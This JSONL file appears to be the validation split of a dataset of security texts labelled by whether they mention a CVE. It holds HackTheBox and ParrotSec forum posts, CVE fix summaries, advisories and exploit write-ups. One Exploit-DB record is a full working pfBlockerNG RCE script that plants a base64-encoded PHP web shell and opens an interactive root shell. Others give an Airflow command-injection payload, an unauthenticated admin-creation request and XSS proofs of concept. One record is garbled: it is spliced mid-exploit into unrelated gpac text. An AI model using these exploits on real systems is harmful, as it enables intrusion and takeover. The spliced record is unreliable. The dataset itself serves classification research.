+{"id": "3815e56adb1f55ca2aae", "text": "HTB does not explain these modules very well. It is dissapointing. FUZZing is the easiest way, but HTB, again, screws it up by giving a bad example of the command line. ffuf -w ./vhosts -u http://192.168.10.10 -H \"HOST: FUZZ.randomtarget.com\" -fs 612 of course you should insert the correct host and your target IP which will look something like this... ffuf -w ./vhosts -u http://10.129.42.195 -H \"HOST: FUZZ.inlanefreight.htb\" -fs 612 but this still doesnt work even though it is HTB's example. What they dont tell you is to totally eliminate the ./vhost and relace that with the given wordlist in the module. It will look like this... ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://10.129.42.195 -H \"HOST: FUZZ.inlanefreight.htb\" -fs 612 remember, use your target ip for this. Mine is just an example. And the word list works. Your output will show many lines. Look for the ones that appear \"different\" Then use curl curl -s http://10.129.42.195 -H \"Host: ******.inlanefreight.htb\" The ***** is the name, for example... curl -s http://10.129.42.195 -H \"Host: accounts.inlanefreight.htb\" The rest is on you.", "source": "hackthebox", "timestamp": "2022-12-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "082fc103a75dcd032354", "text": "I tried a lot and got stuck at one injection trick which says that the moving permission is denied. Any further insight you have for me on this, please.", "source": "hackthebox", "timestamp": "2023-12-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "66cc483f12ca18c15179", "text": "Hi, I am on the skills assessment and am quite stuck from the start… I am attempting to brute force support login, with a 30 sec dely between each req to prevent the lockout and trying to decode the cookie but I am stuck on that as well. any hints? happy to talk over dm’s or discord. Thanks!", "source": "hackthebox", "timestamp": "2022-07-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c841f359d0d541ec8e97", "text": "pen testing an OLD 2007 de-ice s1.100 system \n\nOk, so i am pen testing an old VM that was built for testing against. The scenero is that im “hired” by the ceo to brute force the network. according to the book i have by Thomas Welhelm, once you use hydra to get the username and password combo, you can now ssh intl the box via ssh bbanter@192.168.1.100 from here its supposed to ask for the password and then i can further enumerate the system… BUT here is the issue. since i am using parrot os and its 2023 and not 2007, i cant ssh into the system do to this error: Unable to negotiate with 192.168.1.100 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 to verify that i can login, i went to the 2007 de-ice s1.100 box (192.168.1.100) and ssh’ed into itself just fine with no errors. This box was ment to be tested against with backtrack 2 hahaha. i also tried `ssh -o KexAlgorithms=diffe-hellman-group-sha1 bbanter@192.168.1.100 with no luck How do i get this working? thanks", "source": "parrotsec", "timestamp": "2023-06-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "2ccb87949751e455dc01", "text": "Yes, I am also stuck at flag4. I pivoted to user Barry, who is adm group member. Found nothing in the logs. To read flag4, tomcat user privileges are required. I have no idea where to go from here. Pivot to tomcat service role?", "source": "hackthebox", "timestamp": "2022-01-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d8c89976e833ca1fe231", "text": "[Command Injection - Generic] CVE-2022-38362: Apache Airflow Docker Provider <3.0 RCE vulnerability in example dag\n\nApache Airflow Docker's Provider shipped with an example DAG that was vulnerable to (authenticated) remote code exploit of code on the Airflow worker host.\n\n##Vulnerability summary:\nIn DAG script of airflow 2.3.3, there is a command injection vulnerability (RCE) in the script (example_docker_copy_data.py of docker provider), which can obtain the permission of the operating system. \n\nsource path: \nairflow-2.3.3/airflow/providers/docker/example_dags/example_docker_copy_data.py\n\n##Vulnerability details:\n(1) Vulnerability principle:\n1. It can be seen from the source code of example_docker_copy_data.py script that there is the function of executing bash command, The parameter ‘source_location’ in the template expression {{params.source_location}} is externally controllable and rendered through the jiaja2 template: \n\n{F1869746}\n\n2. Further analysis “from airflow.operators.bash import BashOperator” code, we can see bash_command parameter value will be executed as a bash script;\n\n{F1869748}\n\n(2)Vulnerability exploit:\n1. Enter the DAGs menu and start docker_sample_copy_data task, select “Trigger DAG w/ config”. \n\nhttp://192.168.3.17:8080/trigger?dag_id=docker_sample_copy_data\n\n{F1869749}\n\n2. To construct payload, we can separate commands with ‘;’, so as to inject any operating system commands to be executed(RCE).\n\n{F1869750}\n\nPAYLOAD:```{\"source_location\":\";touch /tmp/thisistest;\"}```, Then click trigger to execute the task.\n\n{F1869755}\n\nThe final command is as follows:\n```locate_file_cmd = “”” sleep 10\nfind ;touch /tmp/thisistest; -type f -printf “%f\\n” | head -1\n“””\n```\n\nThrough the log and server view, it can be seen that arbitrary command has been executed successfully.\n\n{F1869756}\n\n{F1869757}\n\n## Impact\n\nAn attacker can execute arbitrary commands on the airflow host.", "source": "hackerone", "timestamp": "2022-09-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "29e59b5a924213ed37f9", "text": "CVE: CVE-2022-2015\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository jgraph/drawio prior to 19.0.2.'}]\n\nFix commit: 19.0.2 release", "source": "cvefixes", "timestamp": "2022-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8214167dbebc0059a93b", "text": "CVE: CVE-2022-22116\n\n[{'lang': 'en', 'value': 'In Directus, versions 9.0.0-alpha.4 through 9.4.1 are vulnerable to stored Cross-Site Scripting (XSS) vulnerability via SVG file upload in media upload functionality. A low privileged attacker can inject arbitrary javascript code which will be executed in a victim’s browser when they open the image URL.'}]\n\nFix commit: Add Content-Security-Policy header by default (#10776)", "source": "cvefixes", "timestamp": "2022-01-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "6792667b437158980662", "text": "CVE: CVE-2022-2713\n\n[{'lang': 'en', 'value': 'Insufficient Session Expiration in GitHub repository cockpit-hq/cockpit prior to 2.2.0.'}]\n\nFix commit: Stop execution of code after redirecting", "source": "cvefixes", "timestamp": "2022-08-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "5bcb65140b7fafbfeb0b", "text": "Improper Input Validation in Xerces\n\n[Severity: MEDIUM]\n\nA flaw was found in Wildfly's implementation of Xerces, specifically in the way the XMLSchemaValidator class in the JAXP component of Wildfly enforced the \"use-grammar-pool-only\" feature. This flaw allows a specially-crafted XML file to manipulate the validation process in certain cases. This issue is the same flaw as CVE-2020-14621, which affected OpenJDK, and uses a similar code. All xerces jboss versions before 2.12.0.SP3.", "source": "github_advisory", "timestamp": "2022-02-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "97cec687c2505632bb1e", "text": "The Importance of Web Development in Digital Marketing\n\nIn today's fast-paced environment, many people are removing the old-fashioned marketing model. They have introduced digital marketing that is cost-effective and simple to access. It's the ideal way to reach a broad crowd in one go. Web development is a part of digital marketing and can help businesses increase their exposure and earn more money. Web development services allow you to expand your business efficiently and efficiently. It is a highly-specialized field of digital marketing that can be profitable. Web development content is essential in developing your business, as a thorough study is necessary for digital marketing. This content also offers the correct information about digital marketing to the readers.", "source": "go4expert", "timestamp": "2023-03-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "3ef346cddb10b893ffa8", "text": "CVE: CVE-2021-3155\n\n[{'lang': 'en', 'value': 'snapd 2.54.2 and earlier created ~/snap directories in user home directories without specifying owner-only permissions. This could allow a local attacker to read information that should have been private. Fixed in snapd versions 2.54.3+18.04, 2.54.3+20.04 and 2.54.3+21.10.1'}]\n\nFix commit: Merge pull request #9897 from anonymouse64/bugfix/lp-1910298-part-1\n\nusersession/autostart: change ~/snap perms to 0700 on startup", "source": "cvefixes", "timestamp": "2022-02-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "3159cfa0b9c72db6a6e3", "text": "It’s one of those assignments that takes a couple of tries. I wasn’t sure how the php code in the module example was creating the hashes, so i got to an online php sandbox an experimented with a couple of lines of codes to figure it out. After having some ideas, modified the module’s python script to compute the hashes for the htbuser user and compared it with the one generated in the question page. Once i got a hit, it confirmed the way it was computing the hashes. Modified the script it to htbadmin user, got it running and pressed the button to generate the token again. Then it was just a matter of waiting.", "source": "hackthebox", "timestamp": "2023-12-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b5d29ef7c000785012e7", "text": "CVE: CVE-2022-28044\n\n[{'lang': 'en', 'value': 'Irzip v0.640 was discovered to contain a heap memory corruption via the component lrzip.c:initialise_control.'}]\n\nFix commit: Fix control->suffix being deallocated as heap memory as reported by Pietro Borrello.", "source": "cvefixes", "timestamp": "2022-04-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c59281d77b12bb23b366", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nThe Chakra JavaScript engine in Microsoft Edge allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"Scripting Engine Memory Corruption Vulnerability,\" a different vulnerability than CVE-2016-0191 and CVE-2016-0193.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a2b873b618ca21077b44", "text": "Music Gallery Site v1.0 - Broken Access Control\n\n# Exploit Title: Music Gallery Site v1.0 - Broken Access Control\n# Exploit Author: Muhammad Navaid Zafar Ansari\n# Date: 21 February 2023\n\n### CVE Assigned:\n**[CVE-2023-0963](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0963)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0963) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0963)\n\n### Vendor Homepage:\n> https://www.sourcecodester.com\n### Software Link:\n> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)\n### Version:\n> v 1.0\n\n# Tested on: Windows 11\n\n### Broken Authentication:\n> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.\n\n### Vulnerable URLs:\n> /php-music/classes/Users.php\n\n>/php-music/classes/Master.php\n\n### Affected Page:\n> Users.php , Master.php\n> On these page, application isn't verifying the authenticated mechanism. Due to that, all the parameters are vulnerable to broken access control and any remote attacker could create and update the data into the application. Specifically, Users.php could allow to remote attacker to create a admin user without log-in to the application.\n### Description:\n> Broken access control allows any remote attacker to create, update and delete the data of the application. Specifically, adding the admin users\n### Proof of Concept:\n> Following steps are involved:\n1. Send a POST request with required parameter to Users.php?f=save (See Below Request)\n\n2. Request:\n```\nPOST /php-music/classes/Users.php?f=save HTTP/1.1\nHost: localhost\nContent-Length: 876\nsec-ch-ua: \"Not?A_Brand\";v=\"8\", \"Chromium\";v=\"108\"\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryjwBNagY7zt6cjYHp\nX-Requested-With: XMLHttpRequest\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36\nsec-ch-ua-platform: \"Linux\"\nOrigin: http://localhost\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: http://localhost/php-music/admin/?page=user/manage_user\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"id\"\n\n\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"firstname\"\n\nTest\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"middlename\"\n\nAdmin\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"lastname\"\n\nCheck\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"username\"\n\ntestadmin\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"password\"\n\ntest123\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"type\"\n\n1\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryjwBNagY7zt6cjYHp--\n\n```\n\n3. It will create the user by defining the valid values (see below screenshot of successfull response), Successful exploit screenshots are below (without cookie parameter)\n\n\n\n\n\n4. Vulnerable Code Snippets:\n\nUsers.php\n\n\n\nMaster.php\n\n contains loop with unreachable exit condition ('infinite loop') vulnerability in ISOBMFF reader filter, isoffin_read.c. Function isoffin_process() can result in DoS by infinite loop. To exploit, the victim must open a specially crafted mp4 file.\"}]\n\nFix commit: fixed #1876", "source": "cvefixes", "timestamp": "2022-06-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "4bab4ec7cdf1bce563a9", "text": "pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)\n\n# Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)\n# Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22\n# Date: 5th of September 2022\n# Exploit Author: IHTeam\n# Vendor Homepage: https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html\n# Software Link: https://github.com/pfsense/FreeBSD-ports/pull/1169\n# Version: 2.1.4_26\n# Tested on: pfSense 2.6.0\n# CVE : CVE-2022-31814\n# Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/\n\n#!/usr/bin/env python3\nimport argparse\nimport requests\nimport time\nimport sys\nimport urllib.parse\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nparser = argparse.ArgumentParser(description=\"pfBlockerNG <= 2.1.4_26 Unauth RCE\")\nparser.add_argument('--url', action='store', dest='url', required=True, help=\"Full URL and port e.g.: https://192.168.1.111:443/\")\nargs = parser.parse_args()\n\nurl = args.url\nshell_filename = \"system_advanced_control.php\"\n\ndef check_endpoint(url):\n\tresponse = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)\n\tif response.status_code == 200:\n\t\tprint(\"[+] pfBlockerNG is installed\")\n\telse:\n\t\tprint(\"\\n[-] pfBlockerNG not installed\")\n\t\tsys.exit()\n\ndef upload_shell(url, shell_filename):\n\tpayload = {\"Host\":\"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '\"}\n\tprint(\"[/] Uploading shell...\")\n\tresponse = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)\n\ttime.sleep(2)\n\tresponse = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)\n\tif ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):\n\t\tprint(\"[+] Upload succeeded\")\n\telse:\n\t\tprint(\"\\n[-] Error uploading shell. Probably patched \", response.content)\n\t\tsys.exit()\n\ndef interactive_shell(url, shell_filename, cmd):\n\tresponse = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)\n\tprint(str(response.text)+\"\\n\")\n\n\ndef delete_shell(url, shell_filename):\n\tdelcmd = \"rm /usr/local/www/system_advanced_control.php\"\n\tresponse = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)\n\tprint(\"\\n[+] Shell deleted\")\n\ncheck_endpoint(url)\nupload_shell(url, shell_filename)\ntry:\n\twhile True:\n\t\tcmd = input(\"# \")\n\t\tinteractive_shell(url, shell_filename, cmd)\nexcept:\n\tdelete_shell(url, shell_filename)", "source": "exploitdb", "timestamp": "2023-02-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "373b33edf628fd806bd2", "text": "CVE: CVE-2022-2980\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.0259.'}]\n\nFix commit: patch 9.0.0259: crash with mouse click when not initialized\n\nProblem: Crash with mouse click when not initialized.\nSolution: Check TabPageIdxs[] is not NULL.", "source": "cvefixes", "timestamp": "2022-08-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "02d78ed1ef0c847f2344", "text": "Hello I learned alot using TryHackMe website, it’s 15 Euro per month but worth of it.", "source": "parrotsec", "timestamp": "2023-07-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "61eef431efb7944beb1e", "text": "Actually you don’t need a mouse at all to use the system, its Linux you only need a keyboard, but I digress… As it can ‘see’ your mousepad and identifies it correctly, you just need the synaptics packages; sudo apt install xserver-xorg-input-libinput xserver-xorg-input-evdev xserver-xorg-input-mouse xserver-xorg-input-synaptics A reboot should then make it work… But you say you’ve tried this… and… But after I upgraded my ram from 8GB to 16GB. Synaptic touchpad started getting laggy, cursor moves but doesn’t click, even left and right key on touchpad don’t click. would suggest you have disturbed a ribbon cable when you upgraded the RAM or its not quite together properly…", "source": "parrotsec", "timestamp": "2023-03-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "be8b9e81d2e4e52d3399", "text": "Same problem, the question asks only for the switch and the variable and it stays like this “dst host 10.10.20.1” or “dst 10.10.20.1” but with none", "source": "hackthebox", "timestamp": "2022-11-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f613e41c6b105dc0d361", "text": "CVE: CVE-2022-24845\n\n[{'lang': 'en', 'value': 'Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. In affected versions, the return of `.returns_int128()` is not validated to fall within the bounds of `int128`. This issue can result in a misinterpretation of the integer value and lead to incorrect behavior. As of v0.3.0, `.returns_int128()` is validated in simple expressions, but not complex expressions. Users are advised to upgrade. There is no known workaround for this issue.'}]\n\nFix commit: Merge pull request from GHSA-j2x6-9323-fp7h\n\nThis commit addresses two issues in validating returndata, both related\nto the inferred type of the external call return.\n\nFirst, it addresses an issue with interfaces imported from JSON. The\nJSON_ABI encoding type was added in 0.3.0 as part of the calling\nconvention refactor to mimic the old code's behavior when the signature\nof a function had `is_from_json` toggled to True. However, both\nimplementations were a workaround for the fact that in\nFunctionSignatures from JSON with Bytes return types, length is set to 1\nas a hack to ensure they always typecheck - almost always resulting in a\nruntime revert.\n\nThis commit removes the JSON_ABI encoding type, so that dynamic\nreturndata from an interface defined with .json ABI file cannot result\nin a buffer overrun(!). To avoid the issue with always runtime\nreverting, codegen uses the uses the inferred ContractFunction type of\nthe Call.func member (which is both more accurate than the inferred type\nof the Call expression, and the return type on the FunctionSignature!)\nto calculate the length of the external Bytes array.\n\nSecond, this commit addresses an issue with validating call returns in\ncomplex expressions. In the following examples, the type of the call\nreturn is either inferred incorrectly or it takes a path through codegen\nwhich avoids generating runtime clamps:\n\n```\ninterface Foo:\n def returns_int128() -> int128: view\n def returns_Bytes3() -> Bytes[3]: view\n\nfoo: Foo\n...\nx: uint256 = convert(self.foo.returns_int128(), uint256)\ny: Bytes[32] = concat(self.foo.returns_Bytes3(), b\"\")\n```\n\nTo address this issue, if the type of returndata needs validation, this\ncommit decodes the returndata \"strictly\" into a newly allocated buffer\nat the time of the call, to avoid unvalidated data accidentally getting\ninto the runtime. This does result in extra memory traffic which is a\nperformance hit, but the performance issue can be addressed at a later\ndate with a zero-copy buffering scheme (parent Expr allocates the\nbuffer).\n\nAdditional minor fixes and cleanup:\n- fix compiler panic in new_type_to_old_type for Tuples\n- remove `_should_decode` helper function as it duplicates `needs_clamp`\n- minor optimization in returndatasize check - assert ge uses one fewer\n instruction than assert gt.", "source": "cvefixes", "timestamp": "2022-04-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f1b68d6bf349c21859cf", "text": "CVE: CVE-2022-21680\n\n[{'lang': 'en', 'value': 'Marked is a markdown parser and compiler. Prior to version 4.0.10, the regular expression `block.def` may cause catastrophic backtracking against some strings and lead to a regular expression denial of service (ReDoS). Anyone who runs untrusted markdown through a vulnerable version of marked and does not use a worker with a time limit may be affected. This issue is patched in version 4.0.10. As a workaround, avoid running untrusted markdown through marked or run marked on a worker thread and set a reasonable time limit to prevent draining resources.'}]\n\nFix commit: Merge pull request from GHSA-rrrm-qjm4-v8hf\n\n* fix: fix reflink redos\n\nCo-authored-by: MakeNowJust \n\n* fix: fix def redos\n\nCo-authored-by: MakeNowJust \n\n* fix block label for multiple slashes\n\nCo-authored-by: MakeNowJust ", "source": "cvefixes", "timestamp": "2022-01-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "494cfcee7363853665a7", "text": "protobuf-java has a potential Denial of Service issue\n\n[Severity: MEDIUM]\n\n## Summary\nA potential Denial of Service issue in `protobuf-java` core and lite was discovered in the parsing procedure for binary and text format data. Input streams containing multiple instances of non-repeated [embedded messages](http://developers.google.com/protocol-buffers/docs/encoding#embedded) with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. \n\nReporter: [OSS Fuzz](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48771)\n\nAffected versions: This issue affects both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime.\n\n## Severity\n\n[CVE-2022-3171](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3171) Medium - CVSS Score: 5.7 (NOTE: there may be a delay in publication)\n\n## Remediation and Mitigation\n\nPlease update to the latest available versions of the following packages:\n\nprotobuf-java (3.21.7, 3.20.3, 3.19.6, 3.16.3)\nprotobuf-javalite (3.21.7, 3.20.3, 3.19.6, 3.16.3)\nprotobuf-kotlin (3.21.7, 3.20.3, 3.19.6, 3.16.3)\nprotobuf-kotlin-lite (3.21.7, 3.20.3, 3.19.6, 3.16.3)\ngoogle-protobuf [JRuby gem only] (3.21.7, 3.20.3, 3.19.6)\n", "source": "github_advisory", "timestamp": "2022-10-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "fd0b2b522a3d5f75d28a", "text": "django-sendfile2 before 0.7.0 contains reflected file download vulnerability\n\n[Severity: HIGH]\n\nSimilar to CVE-2022-36359 for Django, django-sendfile2 did not protect against a reflected file download attack in version 0.6.1 and earlier. If the file name used by django-sendfile2 was derived from user input, then it would be possible to perform a such an attack. A new version of django-sendfile2 will be released. Either download django-sendfile2 0.7.0 as a workaround or sanitize user input yourself, using Django's patch as a template: https://github.com/django/django/commit/bd062445cffd3f6cc6dcd20d13e2abed818fa173", "source": "github_advisory", "timestamp": "2022-08-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c969891c856af4cdb3dc", "text": "CVE: CVE-2022-31624\n\n[{'lang': 'en', 'value': 'MariaDB Server before 10.7 is vulnerable to Denial of Service. While executing the plugin/server_audit/server_audit.c method log_statement_ex, the held lock lock_bigbuffer is not released correctly, which allows local users to trigger a denial of service due to the deadlock.'}]\n\nFix commit: MDEV-26556 An improper locking bug(s) due to unreleased lock.\n\nGet rid of the global big_buffer.", "source": "cvefixes", "timestamp": "2022-05-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b7a07ae779cdc6eec5bd", "text": "I really can’t find the second flag no matter what I try.", "source": "hackthebox", "timestamp": "2023-03-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "3087ff3b5a999690f57d", "text": "When I tried the 3. command I had a completely different result. My result was 738. The answer was incorrect. Then I just tried to type in 737 and it was correct. Does anybody know why there was one more package listed?", "source": "hackthebox", "timestamp": "2022-02-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "577bdf6b5f689910afb3", "text": "[Cross-site Scripting (XSS) - Generic] CVE-2022-23519: Rails::Html::SafeListSanitizer vulnerable to XSS when certain tags are allowed (math+style || svg+style)\n\nThe following is from: https://hackerone.com/reports/1656627\n\n## Intro\n\nThe Rails HTML sanitzier allows to set certain combinations of tags in it's allow list that are not properly handled. \nSimilar to the report [1530898](https://hackerone.com/reports/1530898), which identified the combination`select` and `style` as vulnerable,\nmy fuzz testing from today suggests that also `svg` and `style` as well as `math` and `style` allow XSS.\nThe following are PoCs for each of these allow list:\n- `svg` and `style`: ` `\n- `math` and `style`: ` `\n\nSee the following IRB session: \n```\nirb(main):016:0> require 'rails-html-sanitizer'\n=> false\nirb(main):017:0> Rails::Html::SafeListSanitizer.new.sanitize(\" \", tags: [\"svg\", \"style\"]).to_s\n=> \" \"\nirb(main):018:0> Rails::Html::SafeListSanitizer.new.sanitize(\" \", tags: [\"math\", \"style\"]).to_s\n=> \" \"\nirb(main):019:0> puts Rails::Html::Sanitizer::VERSION\n1.4.3\n=> nil \n```\n\n## Sample Vulnerable Rails Application\n\nTo build a sample rails application that is vulnerable, I've used the following `Dockerfile`:\n\n```\nFROM ruby:3.1.2\n\nRUN apt-get update && apt-get install -y vim\n\nWORKDIR /usr/src/app\nRUN gem install rails && rails new myapp\nWORKDIR /usr/src/app/myapp\n\n\nCOPY build-rails-app.sh ./build-rails-app.sh\nRUN sh ./build-rails-app.sh\nRUN RAILS_ENV=production rails assets:precompile\n\nCMD [\"./bin/rails\", \"server\", \"-b\", \"0.0.0.0\", \"-e\", \"production\"]\n```\n\nIn the same directory, put a shell script `build-rails-app.sh` which writes the app:\n\n```\n#!/ibn/sh\n\n# make routes\ncat << EOF > ./config/routes.rb\nRails.application.routes.draw do\n get \"/poc1\", to: \"poc1#index\"\n get \"/poc2\", to: \"poc2#index\"\nend\nEOF\n\n# make Poc1 endpoint\n# http://localhost:8888/poc1?name=%3Csvg%3E%3Cstyle%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/style%3E%3Csvg%3E\nbin/rails generate controller Poc1 index --skip-routes\n\ncat << EOF > ./app/controllers/poc1_controller.rb\nclass Poc1Controller < ApplicationController\n def index\n @name = params[:name] || \"put your name here\"\n end\nend\nEOF\n\n\ncat << EOF > ./app/views/poc1/index.html.erb\n Hello <%= sanitize @name, tags: [\"svg\", \"style\"] %> \n \nPoC with a sanitized, reflected parameter 'name' for which 'svg' annd 'style' tags are allowed.\n \n<%= link_to \"Go to PoC\", \"/poc1?name=\" %>\n \n \nUsing: rails-html-sanitizer <%= Rails::Html::Sanitizer::VERSION %>\nEOF\n\n\n# make Poc2 endpoint\n# http://localhost:8888/poc2?name=%3Cmath%3E%3Cstyle%3E%3Cimg%20src=x%20onerror=alert(1)%3E%3C/style%3E%3Cmath%3E\nbin/rails generate controller Poc2 index --skip-routes\n\ncat << EOF > ./app/controllers/poc2_controller.rb\nclass Poc2Controller < ApplicationController\n def index\n @name = params[:name] || \"put your name here\"\n end\nend\nEOF\n\n\ncat << EOF > ./app/views/poc2/index.html.erb\n Hello <%= sanitize @name, tags: [\"math\", \"style\"] %> \n \nPoC with a sanitized, reflected parameter 'name' for which 'math' annd 'style' tags are allowed.\n \n<%= link_to \"Go to PoC\", \"/poc2?name=\" %>\n \n \nUsing: rails-html-sanitizer <%= Rails::Html::Sanitizer::VERSION %>\nEOF\n```\n\nWith the following `Makefile` you can build and run the application\n\n```\n.PHONY: build\nbuild:\n\tdocker build -t local/railspoc:latest .\n\n.PHONY: run\nrun:\n\tdocker run -it --rm -p 127.0.0.1:8888:3000 local/railspoc:latest\n```\n\nNow you have a Rails application with two routes `/poc1` and `/poc2` running locally. Visit:\n- [http://localhost:8888/poc1?name=%3Csvg%3E%3Cstyle%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/style%3E%3Csvg%3E](http://localhost:8888/poc1?n", "source": "hackerone", "timestamp": "2023-01-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "19948d4ac4e1ea2dd50e", "text": "In actual, I didn’t have to use SharpHound.ps1. The key to solution is acls.csv . This file is one of the files regarding AD and it contains informations about target AD.", "source": "hackthebox", "timestamp": "2023-01-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "688525dd1781fa9ca8db", "text": "CVE: CVE-2022-0235\n\n[{'lang': 'en', 'value': 'node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor'}]\n\nFix commit: 3.1.1 release (#1451)", "source": "cvefixes", "timestamp": "2022-01-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "607951e3caa412aea42e", "text": "I got to the point where I can read and need to pwn leak . I can call handler and get Bye back. I also understand that there are not enough rop gadgets to call system. I tried ret2csu , but as I understand there are also not enough gadgets for this. I’m trying to ret2dl , w/ pwntools. But it says that it can’t find any instructions for syscall. Given the progression of the challenge, it feels like I’m chasing a rabbithole and it should be simpler than that. Can anyone give a hint?", "source": "hackthebox", "timestamp": "2023-07-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
